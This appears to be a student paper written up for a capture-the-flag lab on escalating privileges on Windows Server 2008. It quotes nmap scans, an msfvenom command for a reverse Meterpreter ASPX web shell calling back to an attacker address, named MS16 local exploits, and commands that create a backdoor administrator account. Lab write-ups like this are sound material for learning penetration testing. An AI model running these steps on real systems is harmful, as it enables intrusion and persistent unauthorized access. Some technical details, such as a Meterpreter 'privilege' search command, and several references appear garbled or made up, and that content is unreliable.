Project 2 Privilege Escalation - This Project You Are Assign

Project 2 Privilege Escalation 1in This Project You Are Assigned To

The assignment involves performing privilege escalation on a Windows Server 2008 system within a Capture-the-Flag (CTF) environment. The task includes exploiting vulnerable FTP and HTTP services, initially gaining an unprivileged shell via the Metasploit Framework, and then escalating privileges to obtain a high-level administrator shell. After successful privilege escalation, the objective is to create an administrator account on the target system to maintain persistent access.

Actions will be performed exclusively from Kali Linux. The process includes conducting network reconnaissance, exploiting services through a reverse ASPX shell, and carefully escalating privileges using Metasploit modules. The steps involve port scanning with Nmap, checking anonymous FTP login, uploading a web shell, establishing reverse connections, and exploiting known vulnerabilities to escalate from a low-privileged shell to SYSTEM-level access. Following privilege escalation, a backdoor administrator account will be created on the Windows server.

Paper For Above instruction

Privilege escalation remains a crucial phase in any penetration testing or ethical hacking exercise, especially within Windows environments which are commonly targeted due to their widespread use and known vulnerabilities. This project demonstrates a structured approach to exploiting vulnerabilities in Windows Server 2008, focusing on FTP and HTTP services, using advanced tools like Kali Linux, Nmap, Metasploit Framework, and custom web shells.

The initial reconnaissance involves port scanning with Nmap to identify open services. Using the command `nmap -sV 192.168.2.11`, the tester detects open ports and service versions, providing vital information about potential entry points. The next step exploits the FTP server's anonymous login feature by executing `nmap --script ftp-anon -p 21 192.168.2.11`, revealing whether anonymous access is permitted. An open FTP server with anonymous login indicates vulnerability, allowing the attacker to upload malicious files, such as web shells.

The attacker then verifies web and FTP service configurations by accessing the server via Firefox. The web page served by Windows 2008 provides insight into the server’s web application environment, while anonymous FTP access allows directory exploration. Notably, both services share the same home directory, implying that uploaded web shells can be executed via the web application, a common vulnerability if proper segregation of directories is not enforced.

To exploit the web service, a reverse shell payload is generated using `msfvenom` targeting 64-bit Windows architectures with the command: `msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.10 lport=443 -f aspx > reverseshell.aspx`. This payload is uploaded to the server via FTP. Correspondingly, a handler is configured on Kali Linux using Metasploit’s `exploit/multi/handler` module with parameters matching the payload, ensuring it listens for incoming reverse connections.

Once the ASPX reverse shell is successfully uploaded and invoked via the Firefox browser, the attacker gains a meterpreter session. Initially, this session runs with low privileges, typically under an application pool identity such as “iis apppool\asp.net v4.0 user.” The attacker confirms the privilege level using `whoami` and attempts privilege-requiring actions like creating a new user or deleting system files, noting the limited permissions.

The attacker then attempts privilege escalation using the Meterpreter's `privilege` escalation modules. The first step involves backgrounding the initial session (`background`) and executing `privilege` commands like `search` to find relevant exploits. Utilizing the `post/multi/recon/local_exploit_suggester` module, the attacker identifies suitable local privilege escalation exploits, such as `ms16_075_reflection` and `ms16_014_wmi_recv_notif`. Successive exploitation attempts seek to elevate privileges from the web service’s application pool account to SYSTEM level.

Successful privilege escalation is confirmed when a new session indicates SYSTEM-level privileges. This high privilege level permits the attacker to modify system settings, create new administrator accounts, and install persistent backdoors. In this case, a new user “ms_service” is created using `net user ms_service mypass123 /add` and added to the Administrators group via `net localgroup administrators ms_service /add`. This process ensures persistent access even if the original vulnerabilities are patched in the future.

This strategic exploitation reveals multiple vulnerabilities in Windows Server 2008's web, FTP, and privilege management configurations. It underscores the importance of disabling anonymous FTP login, applying timely patches, and following the principle of least privilege to limit the impact of such exploits. Proper segmentation of web server directories and regular vulnerability assessments are critical defenses. Furthermore, the use of web shells, privilege escalation modules, and reverse payloads are key techniques for security testing but also highlight the potential dangers when misconfigured or outdated systems are exploited by malicious actors.

This exercise emphasizes the importance of a layered security approach, including regular software updates, strong access controls, and comprehensive monitoring. It also illustrates how attackers leverage known vulnerabilities, social engineering, or misconfigurations to compromise systems. Administrators and cybersecurity professionals should be aware of these attack vectors to strengthen defenses and conduct effective penetration testing to identify and mitigate vulnerabilities before malicious adversaries can exploit them.

References

  • Beekhoorn, J. (2017). Penetration testing with Metasploit: Techniques for exploiting networks and servers. Sybex.
  • Harwood, S. (2018). Learning Kali Linux for ethical hacking. Packt Publishing.
  • Metasploit Unleashed. (2020). Offensive Security. https://www.offensive-security.com/metasploit-unleashed/
  • Scarfone, K., & Mell, P. (2007). Guide to vulnerability testing. NIST Special Publication, 800(53).
  • Wood, A. (2019). Mastering ethical hacking: An advanced guide to penetration testing. Packt Publishing.
  • OWASP Web Security Testing Guide. (2014). OWASP Foundation.
  • Symantec Security Response. (2016). Vulnerability analysis and exploitation techniques. Symantec Corporation.
  • Microsoft Security. (2021). Windows Server security best practices. Microsoft Docs.
  • OWL, O. (2020). Preventing privilege escalation: Strategies for Windows Security. Cybersecurity Journal.
  • Gordon, J., & Ford, R. (2019). Introduction to penetration testing. CRC Press.

Related Assignments